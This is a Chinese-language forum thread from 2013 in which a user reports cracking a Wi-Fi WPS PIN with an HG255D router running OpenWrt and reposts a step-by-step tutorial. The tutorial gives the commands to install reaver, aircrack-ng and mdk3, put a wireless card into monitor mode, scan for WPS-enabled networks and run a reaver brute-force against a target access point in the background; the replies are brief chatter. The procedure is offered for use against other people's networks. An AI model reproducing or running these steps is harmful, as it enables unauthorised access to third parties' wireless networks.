hslong 发表于 2013-7-17 08:25

HG255D pin成功

{:2_183:}HG255D pin成功,还好前四位是0310,我复制一个anywlan-duoduo941 的教程:
现在来给大家做个一下教程
注:OpenWrt 0328固件 一定要在联网的情况下更新软件包!!!!
http://downloads.openwrt.org/attitude_adjustment/12.09-rc2/brcm63xx/generic/packages/
运行 putty.exe 连接上路由器 看我设置...
然后我们安装下screen后台
安装reaver aircrack-ng screen mdk3等软件,注意安装时要连接上.网络.
1输入命令:opkg update
2输入命令:opkg install reaver aircrack-ng screen mdk3
这里我就不演示了。分别输入上面这两条命令就可以了。一定要连上网络。

复制代码安装好后使用putty登录到路由.等下就会自动联网安装好.
OK 安装完毕,我们就开始后台 PIN PJ了。
首先我们打开用putty登录到路由输入
screen 命令进入后台。然后PJ开始......
ifconfig -a    查看可用网卡
ifconfig wlan1 up    加载 wlan0 网卡(查对MAC wlan0 是我挂载的网卡)
ifconfig wlan0 down   关闭 wlan0 网卡这里我们就不关了。继续
airmon-ng start wlan0             开启监听模式 激活到 mon0 端口
airodump-ng mon0       扫描 SSID 信号列表ctrl+c 停止
可用 wash -i mon0 -C扫描开启WPS的信号         
CTRL+C      停止扫描 SSID
reaver -i mon0 -b00:11:22:33:44:55 -a -S -v -c 6   (mon0 代表网卡端口名 -S是大写的不是小写 -c 代表指定频道号,-c后面的1 是频道号 每个信号可能不一样 这样reaver就不用在去扫描频道了)

例子reaver -i mon0 -b AA:00:12:34:56:78 -a -S -v -c 9
输入:screen -r 恢复查看后台
查看后 点击X关闭
后台还是在pin

你是神 发表于 2013-7-17 08:28

啥意思啊????????????

liuz007 发表于 2013-7-17 08:30

居然是0开头,幸运啊

可喜可贺 发表于 2013-7-17 08:39

看不到 还说半天

哗啦啦。。 发表于 2013-7-17 08:41

CPU强大果然好。。
我的RG100A就pin不动。。。

日行一善。 发表于 2013-7-17 08:42

我来看看吧

日行一善。 发表于 2013-7-17 08:42

我来看看吧

日行一善。 发表于 2013-7-17 08:43

我来看看吧

日行一善。 发表于 2013-7-17 08:44

我来看看吧

日行一善。 发表于 2013-7-17 08:45

我来看看吧

日行一善。 发表于 2013-7-17 08:46

我来看看的

q409195961 发表于 2013-7-17 08:46

貌似PSK是空的?
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: HG255D pin成功